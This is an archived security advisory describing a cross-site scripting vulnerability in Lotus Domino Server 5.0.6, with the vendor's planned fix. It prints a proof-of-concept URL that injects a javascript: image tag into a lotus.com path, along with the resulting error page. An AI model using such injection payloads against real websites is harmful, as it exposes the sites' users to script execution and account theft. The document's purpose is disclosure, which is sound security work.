TUCoPS :: Web :: Servers :: notes2a.htm

Lotus Domino Server 5.0.6 force Javascript to run 
Vulnerability

    Domino Server

Affected

    Lotus Domino Server 5.0.6

Description

    Hiromitsu Takagi  found following.   Accessing the  following URL,
    the  JavaScript  code  will  be  executed  in  the  browser on the
    server's domain.

        http://www.lotus.com/home.nsf/<img%20src=javascript:alert(document.domain)>

    This page produces output like this:

        =================================================
        Error 404
        HTTP Web Server: Couldn't find design note - ******
        
        ----------------------------------------------------------------------------
        Lotus-Domino Release 5.0.6a
        =================================================
        ******: The JavaScript code is executed here.

    This vulnerability is quite similar to "IIS cross-site scripting
    vulnerabilities (MS00-060)" reported by Microsoft.

Solution

    This was reproduced and documented as SPR #JCHN4V2HUY.  Lotus  are
    currently researching a  fix and have  plans to address  in Domino
    R5.0.9.  When the fix is available, it will be documented at

        http://www.notes.net/r5fixlist.nsf

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH